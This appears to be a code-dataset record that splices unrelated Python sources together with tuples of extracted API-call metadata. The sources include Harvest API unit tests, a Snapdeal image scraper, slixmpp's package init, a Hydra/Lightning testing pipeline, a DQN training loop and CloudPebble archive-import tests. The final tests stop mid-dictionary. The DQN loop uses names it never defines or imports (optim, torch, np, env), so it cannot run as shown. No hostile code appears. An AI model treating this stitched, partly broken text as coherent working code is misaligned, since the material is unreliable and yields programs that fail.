'fatfsgen.FATFS', ([], {'size': '(17 * 1024 * 1024)'}), '(size=17 * 1024 * 1024)\n', (4003, 4026), False, 'import fatfsgen\n'), ((4079, 4097), 'test_utils.fill_sector', 'fill_sector', (['fatfs'], {}), '(fatfs)\n', (4090, 4097), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((4320, 4389), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)\n", (4323, 4389), False, 'from subprocess import STDOUT, 
run\n'), ((5133, 5184), 'test_utils.generate_local_folder_structure', 'generate_local_folder_structure', (['struct_'], {'path_': '"""."""'}), "(struct_, path_='.')\n", (5164, 5184), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((5354, 5423), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)\n", (5357, 5423), False, 'from subprocess import STDOUT, run\n'), ((5439, 5476), 'test_utils.compare_folders', 'compare_folders', (['"""testf"""', '"""Espressif"""'], {}), "('testf', 'Espressif')\n", (5454, 5476), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((6044, 6095), 'test_utils.generate_local_folder_structure', 'generate_local_folder_structure', (['struct_'], {'path_': '"""."""'}), "(struct_, path_='.')\n", (6075, 6095), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((6265, 6334), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)\n", (6268, 6334), False, 'from subprocess import STDOUT, run\n'), ((6350, 6387), 'test_utils.compare_folders', 'compare_folders', (['"""testf"""', '"""Espressif"""'], {}), "('testf', 'Espressif')\n", (6365, 6387), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((7583, 7634), 'test_utils.generate_local_folder_structure', 'generate_local_folder_structure', (['struct_'], {'path_': '"""."""'}), "(struct_, path_='.')\n", (7614, 7634), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((7804, 7873), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 
'fatfs_image.img']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)\n", (7807, 7873), False, 'from subprocess import STDOUT, run\n'), ((7889, 7926), 'test_utils.compare_folders', 'compare_folders', (['"""testf"""', '"""Espressif"""'], {}), "('testf', 'Espressif')\n", (7904, 7926), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((9158, 9209), 'test_utils.generate_local_folder_structure', 'generate_local_folder_structure', (['struct_'], {'path_': '"""."""'}), "(struct_, path_='.')\n", (9189, 9209), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((9379, 9448), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)\n", (9382, 9448), False, 'from subprocess import STDOUT, run\n'), ((9464, 9501), 'test_utils.compare_folders', 'compare_folders', (['"""testf"""', '"""Espressif"""'], {}), "('testf', 'Espressif')\n", (9479, 9501), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((10315, 10366), 'test_utils.generate_local_folder_structure', 'generate_local_folder_structure', (['struct_'], {'path_': '"""."""'}), "(struct_, path_='.')\n", (10346, 10366), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((10559, 10656), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img', '--long-name-support']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img', '--long-name-support'\n ], stderr=STDOUT)\n", (10562, 10656), False, 'from subprocess import STDOUT, run\n'), ((10667, 10704), 'test_utils.compare_folders', 'compare_folders', (['"""testf"""', '"""Espressif"""'], {}), "('testf', 'Espressif')\n", 
(10682, 10704), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((830, 858), 'os.remove', 'os.remove', (['"""fatfs_image.img"""'], {}), "('fatfs_image.img')\n", (839, 858), False, 'import os\n'), ((1266, 1289), 'os.listdir', 'os.listdir', (['"""Espressif"""'], {}), "('Espressif')\n", (1276, 1289), False, 'import os\n'), ((1432, 1460), 'os.listdir', 'os.listdir', (['"""Espressif/TEST"""'], {}), "('Espressif/TEST')\n", (1442, 1460), False, 'import os\n'), ((1613, 1646), 'os.listdir', 'os.listdir', (['"""Espressif/TEST/TEST"""'], {}), "('Espressif/TEST/TEST')\n", (1623, 1646), False, 'import os\n'), ((2844, 2867), 'os.listdir', 'os.listdir', (['"""Espressif"""'], {}), "('Espressif')\n", (2854, 2867), False, 'import os\n'), ((2904, 2936), 'os.listdir', 'os.listdir', (['"""Espressif/TESTFOLD"""'], {}), "('Espressif/TESTFOLD')\n", (2914, 2936), False, 'import os\n'), ((4409, 4432), 'os.listdir', 'os.listdir', (['"""Espressif"""'], {}), "('Espressif')\n", (4419, 4432), False, 'import os\n'), ((4469, 4501), 'os.listdir', 'os.listdir', (['"""Espressif/TESTFOLD"""'], {}), "('Espressif/TESTFOLD')\n", (4479, 4501), False, 'import os\n'), ((976, 1001), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (991, 1001), False, 'import os\n'), ((5249, 5274), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (5264, 5274), False, 'import os\n'), ((6160, 6185), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (6175, 6185), False, 'import os\n'), ((7699, 7724), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (7714, 7724), False, 'import os\n'), ((9274, 9299), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (9289, 9299), False, 'import os\n'), ((10431, 10456), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (10446, 10456), False, 'import os\n')] |
# Copyright 2020 Bradbase
import os, sys
import unittest
import configparser
from dataclasses import asdict
from requests_oauthlib import OAuth2Session
from oauthlib.oauth2 import MobileApplicationClient, WebApplicationClient
import httpretty
import warnings
from dacite import from_dict
import json
sys.path.insert(0, sys.path[0]+"/..")
import harvest
from harvest.harvestdataclasses import *
"""
There is a sample test config.
Copy it, name it test_config.ini and fill it out with your test details.
tests/test_config.ini is already in .gitignore
Just in case, the test config file looks like this:
[PERSONAL ACCESS TOKEN]
url = https://api.harvestapp.com/api/v2
put_auth_in_header = True
personal_token = <PASSWORD> <PASSWORD>
account_id = 1234567
[OAuth2 Implicit Code Grant]
uri = https://api.harvestapp.com/api/v2
client_id = aclientid
auth_url = https://id.getharvest.com/oauth2/authorize
[OAuth2 Authorization Code Grant]
uri = https://api.harvestapp.com/api/v2
client_id = aclientid
client_secret = itsmysecret
auth_url = https://id.getharvest.com/oauth2/authorize
token_url = https://id.getharvest.com/api/v2/oauth2/token
account_id = 1234567
"""
"""
Those who tread this path:-
These tests currently really only test that the default URL has been formed
correctly and that the datatype that gets returned can be typed into the dataclass.
Probably enough but a long way from "comprehensive".
"""
class TestTasks(unittest.TestCase):
def setUp(self):
personal_access_token = PersonalAccessToken('ACCOUNT_NUMBER', 'PERSONAL_ACCESS_TOKEN')
self.harvest = harvest.Harvest('https://api.harvestapp.com/api/v2', personal_access_token)
warnings.filterwarnings("ignore", category=ResourceWarning, message="unclosed.*") # There's a bug in httpretty ATM.
httpretty.enable()
def teardown(self):
httpretty.reset()
httpretty.disable()
def test_tasks(self):
task_8083800_dict = {
"id":8083800,
"name":"Business Development",
"billable_by_default":False,
"default_hourly_rate":0.0,
"is_default":False,
"is_active":True,
"created_at":"2017-06-26T22:08:25Z",
"updated_at":"2017-06-26T22:08:25Z"
}
task_8083369_dict = {
"id":8083369,
"name":"Research",
"billable_by_default":False,
"default_hourly_rate":0.0,
"is_default":True,
"is_active":True,
"created_at":"2017-06-26T20:41:00Z",
"updated_at":"2017-06-26T21:53:34Z"
}
task_8083368_dict = {
"id":8083368,
"name":"Project Management",
"billable_by_default":True,
"default_hourly_rate":100.0,
"is_default":True,
"is_active":True,
"created_at":"2017-06-26T20:41:00Z",
"updated_at":"2017-06-26T21:14:10Z"
}
task_8083366_dict = {
"id":8083366,
"name":"Programming",
"billable_by_default":True,
"default_hourly_rate":100.0,
"is_default":True,
"is_active":True,
"created_at":"2017-06-26T20:41:00Z",
"updated_at":"2017-06-26T21:14:07Z"
}
task_8083365_dict = {
"id":8083365,
"name":"Graphic Design",
"billable_by_default":True,
"default_hourly_rate":100.0,
"is_default":True,
"is_active":True,
"created_at":"2017-06-26T20:41:00Z",
"updated_at":"2017-06-26T21:14:02Z"
}
task_8083782_dict = {
"id":8083782,
"name":"<NAME>",
"billable_by_default":True,
"default_hourly_rate":0.0, # TODO: this is supposed to be an int. Something isn't casting int to float.
"is_default":False,
"is_active":True,
"created_at":"2017-06-26T22:04:31Z",
"updated_at":"2017-06-26T22:04:31Z"
}
tasks_dict = {
"tasks":[task_8083800_dict, task_8083369_dict, task_8083368_dict, task_8083366_dict, task_8083365_dict],
"per_page":100,
"total_pages":1,
"total_entries":5,
"next_page":None,
"previous_page":None,
"page":1,
"links":{
"first":"https://api.harvestapp.com/v2/tasks?page=1&per_page=100",
"next":None,
"previous":None,
"last":"https://api.harvestapp.com/v2/tasks?page=1&per_page=100"
}
}
# tasks
httpretty.register_uri(httpretty.GET,
"https://api.harvestapp.com/api/v2/tasks?page=1&per_page=100",
body=json.dumps(tasks_dict),
status=200
)
tasks = from_dict(data_class=Tasks, data=tasks_dict)
requested_tasks = self.harvest.tasks()
self.assertEqual(requested_tasks, tasks)
# get_task
httpretty.register_uri(httpretty.GET,
"https://api.harvestapp.com/api/v2/tasks/8083800",
body=json.dumps(task_8083800_dict),
status=200
)
task = from_dict(data_class=Task, data=task_8083800_dict)
requested_task = self.harvest.get_task(task_id= 8083800)
self.assertEqual(requested_task, task)
# create_task
httpretty.register_uri(httpretty.POST,
"https://api.harvestapp.com/api/v2/tasks",
body=json.dumps(task_8083782_dict),
status=201
)
new_task = from_dict(data_class=Task, data=task_8083782_dict)
requested_new_task = self.harvest.create_task(name= "New Task Name", default_hourly_rate= 120.0) # Harvest doco is wrong. they use hourly_rate not default_hourly_rate
self.assertEqual(requested_new_task, new_task)
# update_task
task_8083782_dict["is_default"] = True
httpretty.register_uri(httpretty.PATCH,
"https://api.harvestapp.com/api/v2/tasks/8083782",
body=json.dumps(task_8083782_dict),
status=200
)
updated_task = from_dict(data_class=Task, data=task_8083782_dict)
requested_updated_task = self.harvest.update_task(task_id=8083782, is_default=True)
self.assertEqual(requested_updated_task, updated_task)
# delete_task
httpretty.register_uri(httpretty.DELETE,
"https://api.harvestapp.com/api/v2/tasks/8083782",
status=200
)
requested_deleted_task = self.harvest.delete_task(task_id=8083782)
self.assertEqual(requested_deleted_task, None)
httpretty.reset()
| [
"dacite.from_dict",
"sys.path.insert",
"httpretty.disable",
"httpretty.register_uri",
"httpretty.enable",
"json.dumps",
"harvest.Harvest",
"warnings.filterwarnings",
"httpretty.reset"
] | [((303, 342), 'sys.path.insert', 'sys.path.insert', (['(0)', "(sys.path[0] + '/..')"], {}), "(0, sys.path[0] + '/..')\n", (318, 342), False, 'import os, sys\n'), ((1596, 1671), 'harvest.Harvest', 'harvest.Harvest', (['"""https://api.harvestapp.com/api/v2"""', 'personal_access_token'], {}), "('https://api.harvestapp.com/api/v2', personal_access_token)\n", (1611, 1671), False, 'import harvest\n'), ((1680, 1766), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {'category': 'ResourceWarning', 'message': '"""unclosed.*"""'}), "('ignore', category=ResourceWarning, message=\n 'unclosed.*')\n", (1703, 1766), False, 'import warnings\n'), ((1804, 1822), 'httpretty.enable', 'httpretty.enable', ([], {}), '()\n', (1820, 1822), False, 'import httpretty\n'), ((1856, 1873), 'httpretty.reset', 'httpretty.reset', ([], {}), '()\n', (1871, 1873), False, 'import httpretty\n'), ((1882, 1901), 'httpretty.disable', 'httpretty.disable', ([], {}), '()\n', (1899, 1901), False, 'import httpretty\n'), ((5178, 5222), 'dacite.from_dict', 'from_dict', ([], {'data_class': 'Tasks', 'data': 'tasks_dict'}), '(data_class=Tasks, data=tasks_dict)\n', (5187, 5222), False, 'from dacite import from_dict\n'), ((5560, 5610), 'dacite.from_dict', 'from_dict', ([], {'data_class': 'Task', 'data': 'task_8083800_dict'}), '(data_class=Task, data=task_8083800_dict)\n', (5569, 5610), False, 'from dacite import from_dict\n'), ((5964, 6014), 'dacite.from_dict', 'from_dict', ([], {'data_class': 'Task', 'data': 'task_8083782_dict'}), '(data_class=Task, data=task_8083782_dict)\n', (5973, 6014), False, 'from dacite import from_dict\n'), ((6546, 6596), 'dacite.from_dict', 'from_dict', ([], {'data_class': 'Task', 'data': 'task_8083782_dict'}), '(data_class=Task, data=task_8083782_dict)\n', (6555, 6596), False, 'from dacite import from_dict\n'), ((6783, 6890), 'httpretty.register_uri', 'httpretty.register_uri', (['httpretty.DELETE', '"""https://api.harvestapp.com/api/v2/tasks/8083782"""'], 
{'status': '(200)'}), "(httpretty.DELETE,\n 'https://api.harvestapp.com/api/v2/tasks/8083782', status=200)\n", (6805, 6890), False, 'import httpretty\n'), ((7071, 7088), 'httpretty.reset', 'httpretty.reset', ([], {}), '()\n', (7086, 7088), False, 'import httpretty\n'), ((5097, 5119), 'json.dumps', 'json.dumps', (['tasks_dict'], {}), '(tasks_dict)\n', (5107, 5119), False, 'import json\n'), ((5473, 5502), 'json.dumps', 'json.dumps', (['task_8083800_dict'], {}), '(task_8083800_dict)\n', (5483, 5502), False, 'import json\n'), ((5873, 5902), 'json.dumps', 'json.dumps', (['task_8083782_dict'], {}), '(task_8083782_dict)\n', (5883, 5902), False, 'import json\n'), ((6451, 6480), 'json.dumps', 'json.dumps', (['task_8083782_dict'], {}), '(task_8083782_dict)\n', (6461, 6480), False, 'import json\n')] |
import bs4
import requests
import os
str = input()
input_str = str
str = str.replace(" ", "&20")
url = "https://www.snapdeal.com/search?keyword={}&santizedKeyword=&catId=&categoryId=0&suggested=false&vertical=&noOfResults=20&searchState=&clickSrc=go_header&lastKeyword=&prodCatId=&changeBackToAll=false&foundInAll=false&categoryIdSearched=&cityPageUrl=&categoryUrl=&url=&utmContent=&dealDetail=&sort=rlvncy".format(str)
response = requests.get(url)
soup = bs4.BeautifulSoup(response.content)
picture_element = soup.findAll('picture')
count = 0
try:
os.mkdir(input_str)
for i, picture in enumerate(picture_element):
count = i
with open('{}/{}-{}.jpg'.format(input_str, input_str, i), 'wb') as file:
try:
img_url = picture.img.attrs['src']
response = requests.get(img_url)
file.write(response.content)
except KeyError:
img_url = picture.img.attrs['data-src']
response = requests.get(img_url)
file.write(response.content)
except FileExistsError:
print("The search keyword is same to a previously searched keyword. Therefore, deleting old files.")
for f in os.listdir(input_str):
os.remove(os.path.join(input_str, f))
for i, picture in enumerate(picture_element):
count = i
with open('{}/{}-{}.jpg'.format(input_str, input_str, i), 'wb') as file:
try:
img_url = picture.img.attrs['src']
response = requests.get(img_url)
file.write(response.content)
except KeyError:
img_url = picture.img.attrs['data-src']
response = requests.get(img_url)
file.write(response.content)
print(count, "new files are saved in the newly created folder") | [
"os.listdir",
"os.path.join",
"requests.get",
"bs4.BeautifulSoup",
"os.mkdir"
] | [((432, 449), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (444, 449), False, 'import requests\n'), ((457, 492), 'bs4.BeautifulSoup', 'bs4.BeautifulSoup', (['response.content'], {}), '(response.content)\n', (474, 492), False, 'import bs4\n'), ((555, 574), 'os.mkdir', 'os.mkdir', (['input_str'], {}), '(input_str)\n', (563, 574), False, 'import os\n'), ((1207, 1228), 'os.listdir', 'os.listdir', (['input_str'], {}), '(input_str)\n', (1217, 1228), False, 'import os\n'), ((819, 840), 'requests.get', 'requests.get', (['img_url'], {}), '(img_url)\n', (831, 840), False, 'import requests\n'), ((1248, 1274), 'os.path.join', 'os.path.join', (['input_str', 'f'], {}), '(input_str, f)\n', (1260, 1274), False, 'import os\n'), ((998, 1019), 'requests.get', 'requests.get', (['img_url'], {}), '(img_url)\n', (1010, 1019), False, 'import requests\n'), ((1529, 1550), 'requests.get', 'requests.get', (['img_url'], {}), '(img_url)\n', (1541, 1550), False, 'import requests\n'), ((1708, 1729), 'requests.get', 'requests.get', (['img_url'], {}), '(img_url)\n', (1720, 1729), False, 'import requests\n')] |
"""
Slixmpp: The Slick XMPP Library
Copyright (C) 2010 <NAME>
This file is part of Slixmpp.
See the file LICENSE for copying permission.
"""
import logging
logging.getLogger(__name__).addHandler(logging.NullHandler())
import asyncio
# Required for python < 3.7 to use the old ssl implementation
# and manage to do starttls as an unintended side effect
asyncio.sslproto._is_sslproto_available = lambda: False
from slixmpp.stanza import Message, Presence, Iq
from slixmpp.jid import JID, InvalidJID
from slixmpp.xmlstream.stanzabase import ET, ElementBase, register_stanza_plugin
from slixmpp.xmlstream.handler import *
from slixmpp.xmlstream import XMLStream
from slixmpp.xmlstream.matcher import *
from slixmpp.xmlstream.asyncio import asyncio, future_wrapper
from slixmpp.basexmpp import BaseXMPP
from slixmpp.clientxmpp import ClientXMPP
from slixmpp.componentxmpp import ComponentXMPP
from slixmpp.version import __version__, __version_info__
| [
"logging.NullHandler",
"logging.getLogger"
] | [((214, 235), 'logging.NullHandler', 'logging.NullHandler', ([], {}), '()\n', (233, 235), False, 'import logging\n'), ((175, 202), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (192, 202), False, 'import logging\n')] |
from collections import defaultdict
from pathlib import Path
from typing import Dict, List, Optional
import hydra
import numpy as np
import pandas as pd
from omegaconf import DictConfig, OmegaConf
from pytorch_lightning import (
Callback,
LightningDataModule,
LightningModule,
Trainer,
seed_everything,
)
from pytorch_lightning.loggers import LightningLoggerBase
from sklearn.model_selection import KFold
from src.train import PrepareTmpFile
from src.utils import utils
log = utils.get_logger(__name__)
def test(config: DictConfig, datamodule: Optional[LightningDataModule] = None) -> Optional[float]:
"""Contains training pipeline.
Instantiates all PyTorch Lightning objects from config.
Args:
config (DictConfig): Configuration composed by Hydra.
Returns:
Optional[float]: Metric score for hyperparameter optimization.
"""
# Set seed for random number generators in pytorch, numpy and python.random
if config.get("seed"):
seed_everything(config.seed, workers=True)
# Init lightning datamodule
if datamodule is None:
log.info(f"Instantiating datamodule <{config.datamodule._target_}>")
datamodule: LightningDataModule = hydra.utils.instantiate(config.datamodule)
# Init lightning model
log.info(f"Instantiating model <{config.model._target_}>")
model_cls = utils._locate(config.model._target_)
checkpoint_path: Path = Path(config.work_dir) / config.load_checkpoint
model: LightningModule = model_cls.load_from_checkpoint(checkpoint_path)
# Init lightning callbacks
callbacks: List[Callback] = []
if "callbacks" in config:
for _, cb_conf in config.callbacks.items():
if "_target_" in cb_conf:
log.info(f"Instantiating callback <{cb_conf._target_}>")
callbacks.append(hydra.utils.instantiate(cb_conf))
# Init lightning loggers
logger: List[LightningLoggerBase] = []
if "logger" in config:
for _, lg_conf in config.logger.items():
if "_target_" in lg_conf:
log.info(f"Instantiating logger <{lg_conf._target_}>")
logger.append(hydra.utils.instantiate(lg_conf))
# Init lightning trainer
log.info(f"Instantiating trainer <{config.trainer._target_}>")
trainer: Trainer = hydra.utils.instantiate(config.trainer, callbacks=callbacks, logger=logger, _convert_="partial")
# Send some parameters from config to all lightning loggers
log.info("Logging hyperparameters!")
utils.log_hyperparameters(
config=config,
model=model,
datamodule=datamodule,
trainer=trainer,
callbacks=callbacks,
logger=logger,
)
# Evaluate model on test set, using the best model achieved during training
log.info("Starting testing!")
result: List[Dict[str, float]] = trainer.test(model=model, datamodule=datamodule)
# Make sure everything closed properly
log.info("Finalizing!")
utils.finish(
config=config,
model=model,
datamodule=datamodule,
trainer=trainer,
callbacks=callbacks,
logger=logger,
)
return result
def test_cv(config: OmegaConf, df: pd.DataFrame):
# Filter run
log.debug("Filtering")
log.debug(f"Length: {len(df)}")
for name, d in [("model", config.model), ("dataset", config.datamodule), ("trainer", config.trainer)]:
for k, v in d.items():
if len(df) == 1:
break
df = df[df[f"{name}_{k}"] == v]
log.debug(f"{name}_{k}={v}")
log.debug(f"Length: {len(df)}")
index = df.index
assert len(index) == 1
run_name = index[0]
log.info(f"Run name: {run_name}")
checkpoint_paths = df.filter(regex="^best_checkpoint")
result_dict = defaultdict(list)
# Load csv
df = pd.read_csv(config.datamodule.csv_path)
kf = KFold(n_splits=config["folds"], shuffle=True, random_state=config.seed)
datamodule_params = dict(config.datamodule)
datamodule_cls = utils._locate(datamodule_params.pop("_target_"))
datamodule_params.pop("csv_path") # remove csv_path from params
for i, (checkpoint_path, (train_idx, test_idx)) in enumerate(
zip(checkpoint_paths.values[0], kf.split(df)), start=1
):
log.info(f"Start {i}th fold out of {kf.n_splits} folds")
train_df = df.iloc[train_idx]
test_df = df.iloc[test_idx]
valid_df, test_df = np.array_split(test_df, 2)
log.info(checkpoint_path)
config.load_checkpoint = checkpoint_path
# Init lightning datamodule
log.info(f"Instantiating datamodule <{config.datamodule._target_}>")
with PrepareTmpFile(train_df, valid_df, test_df) as (ft, fv, fe):
datamodule: LightningDataModule = datamodule_cls(ft.name, fv.name, fe.name, **datamodule_params)
result: List[Dict[str, float]] = test(config, datamodule)
print(result)
assert len(result) == 1
result = result[0]
for k, v in result.items():
result_dict[k].append(v)
utils.log_cv_result(run_name, config, result_dict)
| [
"src.utils.utils.get_logger",
"pandas.read_csv",
"src.utils.utils.log_cv_result",
"pathlib.Path",
"hydra.utils.instantiate",
"pytorch_lightning.seed_everything",
"src.utils.utils.log_hyperparameters",
"numpy.array_split",
"src.train.PrepareTmpFile",
"collections.defaultdict",
"src.utils.utils._l... | [((499, 525), 'src.utils.utils.get_logger', 'utils.get_logger', (['__name__'], {}), '(__name__)\n', (515, 525), False, 'from src.utils import utils\n'), ((1376, 1412), 'src.utils.utils._locate', 'utils._locate', (['config.model._target_'], {}), '(config.model._target_)\n', (1389, 1412), False, 'from src.utils import utils\n'), ((2334, 2434), 'hydra.utils.instantiate', 'hydra.utils.instantiate', (['config.trainer'], {'callbacks': 'callbacks', 'logger': 'logger', '_convert_': '"""partial"""'}), "(config.trainer, callbacks=callbacks, logger=logger,\n _convert_='partial')\n", (2357, 2434), False, 'import hydra\n'), ((2541, 2674), 'src.utils.utils.log_hyperparameters', 'utils.log_hyperparameters', ([], {'config': 'config', 'model': 'model', 'datamodule': 'datamodule', 'trainer': 'trainer', 'callbacks': 'callbacks', 'logger': 'logger'}), '(config=config, model=model, datamodule=datamodule,\n trainer=trainer, callbacks=callbacks, logger=logger)\n', (2566, 2674), False, 'from src.utils import utils\n'), ((3003, 3124), 'src.utils.utils.finish', 'utils.finish', ([], {'config': 'config', 'model': 'model', 'datamodule': 'datamodule', 'trainer': 'trainer', 'callbacks': 'callbacks', 'logger': 'logger'}), '(config=config, model=model, datamodule=datamodule, trainer=\n trainer, callbacks=callbacks, logger=logger)\n', (3015, 3124), False, 'from src.utils import utils\n'), ((3831, 3848), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (3842, 3848), False, 'from collections import defaultdict\n'), ((3874, 3913), 'pandas.read_csv', 'pd.read_csv', (['config.datamodule.csv_path'], {}), '(config.datamodule.csv_path)\n', (3885, 3913), True, 'import pandas as pd\n'), ((3923, 3994), 'sklearn.model_selection.KFold', 'KFold', ([], {'n_splits': "config['folds']", 'shuffle': '(True)', 'random_state': 'config.seed'}), "(n_splits=config['folds'], shuffle=True, random_state=config.seed)\n", (3928, 3994), False, 'from sklearn.model_selection import 
KFold\n'), ((5121, 5171), 'src.utils.utils.log_cv_result', 'utils.log_cv_result', (['run_name', 'config', 'result_dict'], {}), '(run_name, config, result_dict)\n', (5140, 5171), False, 'from src.utils import utils\n'), ((1004, 1046), 'pytorch_lightning.seed_everything', 'seed_everything', (['config.seed'], {'workers': '(True)'}), '(config.seed, workers=True)\n', (1019, 1046), False, 'from pytorch_lightning import Callback, LightningDataModule, LightningModule, Trainer, seed_everything\n'), ((1226, 1268), 'hydra.utils.instantiate', 'hydra.utils.instantiate', (['config.datamodule'], {}), '(config.datamodule)\n', (1249, 1268), False, 'import hydra\n'), ((1441, 1462), 'pathlib.Path', 'Path', (['config.work_dir'], {}), '(config.work_dir)\n', (1445, 1462), False, 'from pathlib import Path\n'), ((4485, 4511), 'numpy.array_split', 'np.array_split', (['test_df', '(2)'], {}), '(test_df, 2)\n', (4499, 4511), True, 'import numpy as np\n'), ((4723, 4766), 'src.train.PrepareTmpFile', 'PrepareTmpFile', (['train_df', 'valid_df', 'test_df'], {}), '(train_df, valid_df, test_df)\n', (4737, 4766), False, 'from src.train import PrepareTmpFile\n'), ((1858, 1890), 'hydra.utils.instantiate', 'hydra.utils.instantiate', (['cb_conf'], {}), '(cb_conf)\n', (1881, 1890), False, 'import hydra\n'), ((2180, 2212), 'hydra.utils.instantiate', 'hydra.utils.instantiate', (['lg_conf'], {}), '(lg_conf)\n', (2203, 2212), False, 'import hydra\n')] |
from agent import Qnet
from agent import ReplayBuffer
from agent import train
q = Qnet()
q_target = Qnet()
q_target.load_state_dict(q.state_dict())
memory = ReplayBuffer()
print_interval = 20
score = 0.0
optimizer = optim.Adam(q.parameters(), lr=learning_rate)
score_history= []
for n_epi in range(3000):
epsilon = max(0.01, 0.08 - 0.01*(n_epi/200)) #Linear annealing from 8% to 1%
s = env.reset(random_init=True)
done = False
n_step =0
while not done:
n_step +=1
a = q.sample_action(torch.from_numpy(np.array(s)).float(), epsilon)
s_prime, r, done = env.transition(a)
done_mask = 0.0 if done else 1.0
memory.put((s,a,r,s_prime, done_mask))
score += r
if done:
break
s = s_prime
if memory.size()>2000:
train(q, q_target, memory, optimizer)
if n_epi%print_interval==0 and n_epi!=0:
q_target.load_state_dict(q.state_dict())
print("n_episode :{}, score : {:.1f}, n_buffer : {}, eps : {:.1f}%, n_step:{}".format(n_epi, score/print_interval, memory.size(), epsilon*100, n_step))
score_history.append(score/print_interval)
score = 0.0 | [
"agent.train",
"agent.Qnet",
"agent.ReplayBuffer"
] | [((90, 96), 'agent.Qnet', 'Qnet', ([], {}), '()\n', (94, 96), False, 'from agent import Qnet\n'), ((109, 115), 'agent.Qnet', 'Qnet', ([], {}), '()\n', (113, 115), False, 'from agent import Qnet\n'), ((168, 182), 'agent.ReplayBuffer', 'ReplayBuffer', ([], {}), '()\n', (180, 182), False, 'from agent import ReplayBuffer\n'), ((865, 902), 'agent.train', 'train', (['q', 'q_target', 'memory', 'optimizer'], {}), '(q, q_target, memory, optimizer)\n', (870, 902), False, 'from agent import train\n')] |
""" These tests check basic operation of ide.tasks.archive.do_import_archive """
import mock
from django.core.exceptions import ValidationError
from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException
from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings
from ide.models.project import Project
from utils.fakes import FakeS3
__author__ = 'joe'
fake_s3 = FakeS3()
@mock.patch('ide.models.s3file.s3', fake_s3)
class TestImportArchive(CloudpebbleTestCase):
def setUp(self):
self.login()
@staticmethod
def make_resource_spec(name='IMAGE_BLAH'):
return {
'resources': {
'media': [{
'file': 'images/blah.png',
'name': name,
'type': 'bitmap'
}]
}
}
def test_import_basic_bundle_with_appinfo(self):
""" Check that a minimal bundle imports without error """
bundle = build_bundle({
'src/main.c': '',
'appinfo.json': make_appinfo()
})
do_import_archive(self.project_id, bundle)
def test_throws_with_invalid_appinfo(self):
""" Check that appinfo validation is performed with a few invalid values """
invalid_things = [
('projectType', 'invalid'),
('sdkVersion', '1'),
('versionLabel', '01.0'),
]
for k, v in invalid_things:
bundle = build_bundle({
'src/main.c': '',
'appinfo.json': make_appinfo({k: v})
})
with self.assertRaises(ValidationError):
do_import_archive(self.project_id, bundle)
def test_import_basic_bundle_with_npm_manifest(self):
""" Check that archives with package.json can be imported """
bundle = build_bundle({
'src/main.c': '',
'package.json': make_package(package_options={'name': 'myproject'})
})
do_import_archive(self.project_id, bundle)
project = Project.objects.get(pk=self.project_id)
self.assertEqual(project.app_long_name, 'test')
self.assertEqual(project.app_short_name, 'myproject')
def test_import_package_with_dependencies(self):
""" Check that dependencies in a package.json file are imported into the database """
deps = {
'some_package': '3.14.15',
'another': 'http://blah.com/package.git',
}
bundle = build_bundle({
'src/main.c': '',
'package.json': make_package(package_options={
'dependencies': deps
})
})
do_import_archive(self.project_id, bundle)
project = Project.objects.get(pk=self.project_id)
actual_deps = {d.name: d.version for d in project.dependencies.all()}
self.assertDictEqual(actual_deps, deps)
def test_import_package_with_keywords(self):
""" Check that keywords in a package.json file are imported into the database """
keywords = ['pebbles', 'watch', 'bunnies']
bundle = build_bundle({
'src/main.c': '',
'package.json': make_package(package_options={
'keywords': keywords
})
})
do_import_archive(self.project_id, bundle)
project = Project.objects.get(pk=self.project_id)
self.assertEqual(set(keywords), set(project.keywords))
def test_import_appinfo_with_resources(self):
""" Check that a resource can be imported in an appinfo.json project """
bundle = build_bundle({
'src/main.c': '',
'resources/images/blah.png': 'contents!',
